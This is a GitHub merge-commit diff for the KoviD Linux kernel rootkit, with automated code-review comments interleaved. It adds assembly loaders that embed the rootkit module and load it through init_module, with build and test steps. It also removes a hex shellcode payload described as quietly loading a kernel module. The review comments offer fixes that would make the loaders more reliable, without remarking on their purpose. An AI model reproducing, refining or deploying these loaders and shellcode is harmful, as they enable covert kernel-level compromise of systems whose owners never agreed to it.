Merge pull request #149 from carloslack/loader
Loader
carloslack authored Dec 3, 2024
2 parents 3513ade + c26924b commit 5447299
Showing 7 changed files with 301 additions and 33 deletions.
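--- a/inject/Makefile
+++ b/inject/Makefile
@@ -0,0 +1,17 @@
+# turn off ring buffer debug:
+# $ DEPLOY=1 make
+
+LD=$(shell which ld)
+AS=$(shell which as)
+
+all:
+# kovid as include file
+as -o kv_incbin.o kv_incbin.S
+ld -o kv_incbin kv_incbin.o
+# kovid embedded
+as -o kv_embed.o kv_embed.S
+ld -o kv_embed kv_embed.o
+
+clean:
+@rm -fv *.o kv_incbin kv_embed
+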
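Review bot: `LD` and `AS` are resolved with `$(shell which …)` at the top of the file, but the recipes under `all:` still invoke bare `as` and `ld`, so the two variables are dead and a toolchain override (cross-assembling, a pinned binutils) has no effect; either use `$(AS) -o kv_incbin.o kv_incbin.S` / `$(LD) -o kv_incbin kv_incbin.o` (and likewise for kv_embed) or drop the assignments. `all` and `clean` are not declared `.PHONY`, so a stray file named `all` or `clean` in inject/ would silently make the target a no-op; `.PHONY: all clean` fixes that. The header comment about `DEPLOY=1` refers to a variable this Makefile never reads — presumably it belongs to the parent build — so it should either say so or be removed. There are also no prerequisites, so `kv_incbin` is not rebuilt when `../kovid.ko` changes and `kv_embed` is not rebuilt when `kv_embed.inc` changes; `kv_incbin: kv_incbin.S ../kovid.ko` and `kv_embed: kv_embed.S kv_embed.inc` would let make track that.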
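--- a/inject/README.md
+++ b/inject/README.md
@@ -0,0 +1,13 @@
+## 1 Build steps
+
+### 1.1 Build KoviD
+
+cd ../ && PROCNAME=kovid make && make strip && cd -
+
+## 2 Build payload
+
+./update.sh && make
+
+## 3 Test
+
+sudo ./kv_embed ; dmesg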
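--- a/inject/hello.c
+++ b/inject/hello.c
@@ -0,0 +1,19 @@
+// hello.c
+#include <linux/init.h>
+#include <linux/module.h>
+
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("hash");
+MODULE_DESCRIPTION("Hello World");
+
+static int __init hello_init(void) {
+printk(KERN_INFO "Hello, world!\n");
+return 0;
+}
+
+static void __exit hello_exit(void) {
+printk(KERN_INFO "Bye!\n");
+}
+
+module_init(hello_init);
+module_exit(hello_exit);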
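Review bot: Nothing else in this commit builds or references hello.c — the new Makefile only assembles the two loaders and the README never mentions it — so its purpose is unclear to a reader of inject/; presumably it is a minimal module for exercising the loaders without KoviD, in which case a header comment such as `/* Minimal test module: build as hello.ko and point kv_incbin.S at it to check the init_module path without loading KoviD */` should say so, otherwise the file should be dropped. As a point of style, current kernel code prefers `pr_info("Hello, world!\n");` over `printk(KERN_INFO "Hello, world!\n");`, and the same for the exit message.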
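--- a/inject/kv_embed.S
+++ b/inject/kv_embed.S
@@ -0,0 +1,108 @@
+# BSD 3-Clause License
+#
+# Copyright (c) 2024, Carlos Carvalho
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#
+# 1. Redistributions of source code must retain the above copyright notice, this
+# list of conditions and the following disclaimer.
+#
+# 2. Redistributions in binary form must reproduce the above copyright notice,
+# this list of conditions and the following disclaimer in the documentation
+# and/or other materials provided with the distribution.
+#
+# 3. Neither the name of the copyright holder nor the names of its
+# contributors may be used to endorse or promote products derived from
+# this software without specific prior written permission.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+# © 2022 GitHub, Inc.
+# Terms
+# Privacy
+# Security
+
+
+# mmap and load KoviD binary from .inc file
+
+.section .data
+empty_str: .asciz "" # pass empty name to init_module so to avoid a warning
+
+.section .text
+.globl _start
+
+_start:
+# module size
+mov $kovid_ko_end-kovid_ko, %r15
+
+add $4095, %r15
+and $-4096, %r15
+
+mov $9, %rax # mmap syscall number
+xor %rdi, %rdi # addr = NULL (let kernel choose)
+mov %r15, %rsi # length = rounded up module size
+mov $3, %rdx # prot = PROT_READ | PROT_WRITE 0x3
+mov $0x22, %r10 # flags = MAP_PRIVATE | MAP_ANONYMOUS
+mov $-1, %r8 # fd = -1 (anonymous mapping)
+xor %r9, %r9 # offset 0
+syscall
+
+cmp $-1, %rax
+je mmap_error
+
+mov %rax, %r12 # mmap addr
+
+lea kovid_ko(%rip), %rsi # src
+mov %r12, %rdi # dst
+mov $kovid_ko_end-kovid_ko, %rcx # module size
+rep movsb
+
+mov $175, %rax # init_module syscall number
+mov %r12, %rdi # module data
+mov $kovid_ko_end-kovid_ko, %rsi # length of the module
+lea empty_str(%rip), %rdx # empty string as modname
+syscall
+
+cmp $0, %rax
+jne init_error
+
+mov $11, %rax # munmap syscall number
+mov %r12, %rdi # address
+mov %r15, %rsi # length
+syscall
+
+mov $60, %rax # exit
+xor %rdi, %rdi # zero status
+syscall
+
+mmap_error:
+mov $60, %rax # exit
+mov $1, %rdi # status 1
+syscall
+
+init_error:
+mov $11, %rax # munmap syscall number
+mov %r12, %rdi # address
+mov %r15, %rsi # length
+syscall
+
+mov $60, %rax # exit syscall number
+mov $1, %rdi # status 1
+syscall
+
+.section .data
+kovid_ko:
+.include "kv_embed.inc"
+
+kovid_ko_end:
+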
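Review bot: The mmap failure test `cmp $-1, %rax` / `je mmap_error` after the first `syscall` only catches a return of exactly -1, but a raw Linux `syscall` returns `-errno` in %rax (-12 for ENOMEM, -22 for EINVAL on a zero length, …), so a failed mmap falls through, `%r12` ends up holding a small negative value, and `rep movsb` faults on an invalid high address — the loader dies with SIGSEGV instead of exiting with status 1; the usual check is the unsigned range test `cmp $-4095, %rax` / `jae mmap_error`. `init_module` likewise returns `-errno`, and the `init_error` path throws it away in favour of a constant exit status 1, which hides the one thing an operator needs to know when loading fails (EPERM under lockdown or `kernel.modules_disabled`, ENOKEY/EKEYREJECTED under signature enforcement, EEXIST if already loaded, ENOEXEC for a kernel mismatch); saving %rax in a callee-saved register before the munmap and then negating it into %rdi for the `exit` syscall would preserve it. The copy into an anonymous PROT_READ|PROT_WRITE mapping also looks unnecessary: `init_module` copies the image from user memory itself, so `%rdi` could point straight at `kovid_ko` and the mmap/munmap pair be dropped — if the mapping exists for a reason not visible here, a comment at `_start` should say which. Since the blob is never written, `.section .rodata` would be a better home for `kovid_ko` than `.data`.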
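--- a/inject/kv_incbin.S
+++ b/inject/kv_incbin.S
@@ -0,0 +1,109 @@
+# BSD 3-Clause License
+#
+# Copyright (c) 2024, Carlos Carvalho
+# All rights reserved.
+#
+# Redistribution and use in source and binary forms, with or without
+# modification, are permitted provided that the following conditions are met:
+#
+# 1. Redistributions of source code must retain the above copyright notice, this
+# list of conditions and the following disclaimer.
+#
+# 2. Redistributions in binary form must reproduce the above copyright notice,
+# this list of conditions and the following disclaimer in the documentation
+# and/or other materials provided with the distribution.
+#
+# 3. Neither the name of the copyright holder nor the names of its
+# contributors may be used to endorse or promote products derived from
+# this software without specific prior written permission.
+#
+# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+# © 2022 GitHub, Inc.
+# Terms
+# Privacy
+# Security
+
+
+# mmap and load KoviD binary from disk
+
+.section .data
+empty_str: .asciz "" # pass empty name to init_module so to avoid a warning
+
+.section .text
+.globl _start
+
+_start:
+mov $kovid_ko_end-kovid_ko, %r15
+
+# round up page
+add $4095, %r15
+and $-4096, %r15
+
+mov $9, %rax # mmap syscall number
+xor %rdi, %rdi # addr = NULL (let kernel choose)
+mov %r15, %rsi # length = rounded up module size
+mov $3, %rdx # prot = PROT_READ | PROT_WRITE
+mov $0x22, %r10 # flags = MAP_PRIVATE | MAP_ANONYMOUS
+mov $-1, %r8 # fd = -1 (anonymous mapping)
+xor %r9, %r9 # offset = 0
+syscall
+
+cmp $-1, %rax # failed?
+je mmap_error
+
+# Save the mmap address
+mov %rax, %r12 # save mmap addr
+
+lea kovid_ko(%rip), %rsi # source address
+mov %r12, %rdi # destination address
+mov $kovid_ko_end-kovid_ko, %rcx # size of the module
+rep movsb
+
+mov $175, %rax # init_module syscall number
+mov %r12, %rdi # module data
+mov $kovid_ko_end-kovid_ko, %rsi # length of the module
+lea empty_str(%rip), %rdx # empty string as modname
+syscall
+
+cmp $0, %rax # if init_module return error
+jne init_error
+
+mov $11, %rax # munmap
+mov %r12, %rdi # address
+mov %r15, %rsi # length
+syscall
+
+mov $60, %rax # exit
+xor %rdi, %rdi # zero status
+syscall
+
+mmap_error:
+mov $60, %rax # exit
+mov $1, %rdi # status 1
+syscall
+
+init_error:
+
+mov $11, %rax # munmap
+mov %r12, %rdi # address
+mov %r15, %rsi # length
+syscall
+
+mov $60, %rax
+mov $1, %rdi # exit error
+syscall
+
+.section .data
+kovid_ko:
+.incbin "../kovid.ko"
+kovid_ko_end:
+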
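Review bot: The same mmap check defect as in kv_embed.S is present here — `cmp $-1, %rax` / `je mmap_error` misses every real failure because the raw syscall returns `-errno`, not -1, so a failed mmap leads straight into a faulting `rep movsb`; replace it with `cmp $-4095, %rax` / `jae mmap_error`. The header comment `# mmap and load KoviD binary from disk` is misleading: `.incbin "../kovid.ko"` embeds the image at assembly time, and at run time this loader reads nothing from disk — `../kovid.ko` need not even exist on the target, which is presumably the point; `# KoviD image embedded at assembly time via .incbin; nothing is read from disk at run time` would say what the file actually does. The two loaders are otherwise line-for-line the same code and differ only in the directive that supplies `kovid_ko`, so a bug like the one above has to be fixed twice; a single source with `.ifdef KV_EMBED` selecting `.include "kv_embed.inc"` versus `.incbin "../kovid.ko"` would avoid that.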
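--- a/inject/update.sh
+++ b/inject/update.sh
@@ -0,0 +1,2 @@
+#!/bin/bash
+xxd -i ../kovid.ko |grep ^" "|while read l ; do echo " .byte $l"|sed 's/,$//' ; done >kv_embed.inc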
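Review bot: The pipeline never checks that `../kovid.ko` exists or that `xxd` is installed: if either is missing, `xxd` fails, `grep` matches nothing, and the redirection still creates an empty `kv_embed.inc`, so the following `make` would presumably produce a kv_embed whose embedded module is zero bytes and the problem only surfaces at run time. Add `set -euo pipefail` after the shebang and a guard such as `[ -r ../kovid.ko ] || { echo "update.sh: ../kovid.ko not found, build KoviD first" >&2; exit 1; }` before the pipeline, so that the README's `./update.sh && make` stops at the right step. The `grep ^" "` quoting works but is easy to misread; `grep '^ '` is the conventional spelling.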
66 changes: 33 additions & 33 deletions src/persist.S
Original file line number Diff line number Diff line change
@@ -1,36 +1,36 @@
/**
* Linux Kernel version <= 5.8.0
* - hash
*
* KoviD rootkit
*
* This code is designed to serve as the payload for Volundr.
*
* While it can be readily customized to execute other commands,
* its primary purpose is to load a Linux Kernel Module (LKM) quietly.
*
* Make sure to read this! You will need the 'loadmodule.sh' script:
*
* ---snip---
* #!/bin/bash
* /sbin/insmod $1 2>/dev/null
* ---snip---
*
* \x50\x51\x52\x56\x57\x41\x53\xb8\x39\x00\x00\x00\x0f\x05\x83\xf8\x00\x75
* \x31\x48\x8d\x05\xb9\x00\x00\x00\x48\x8d\x3d\xa6\x00\x00\x00\x48\x31\xd2
* \x52\x50\x57\x48\x89\xe6\x48\xc7\xc0\x3b\x00\x00\x00\x48\x8d\x3d\x8f\x00
* \x00\x00\x48\xc7\xc2\x00\x00\x00\x00\x0f\x05\x48\x31\xc0\xb8\x02\x00\x00
* \x00\x48\x8d\x3d\x8f\x00\x00\x00\x48\xc7\xc6\x00\x00\x00\x00\x0f\x05\x48
* \x83\xec\x10\x48\x89\xc7\xb8\x00\x00\x00\x00\x48\x89\xe6\x48\xc7\xc2\x11
* \x00\x00\x00\x0f\x05\x48\xc7\xc1\x12\x00\x00\x00\xb0\x2d\x48\x89\xe7\xfc
* \xf2\xae\x49\xc7\xc5\x11\x00\x00\x00\x49\x29\xcd\x4c\x89\xe9\x48\x31\xdb
* \x48\x89\xe6\x48\x89\xf7\xfc\xac\x3c\x39\x7e\x04\x2c\x57\xeb\x02\x2c\x30
* \x48\xc1\xe3\x04\x48\x09\xc3\xaa\xe2\xeb\x48\x83\xc4\x10\x49\xb8\x88\x77
* \x66\x55\x44\x33\x22\x11\x49\x01\xd8\x41\x5b\x5f\x5e\x5a\x59\x58\x41\xff
* \xe0\x2f\x76\x61\x72\x2f\x2e\x6c\x6d\x2e\x73\x68\x2f\x76\x61\x72\x2f\x2e
* \x6b\x76\x2e\x6b\x6f\x2f\x70\x72\x6f\x63\x2f\x73\x65\x6c\x66\x2f\x6d\x61
* \x70\x73
*/
# BSD 3-Clause License
#
# Copyright (c) 2024, Carlos Carvalho
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# © 2022 GitHub, Inc.
# Terms
# Privacy
# Security

.globl _start

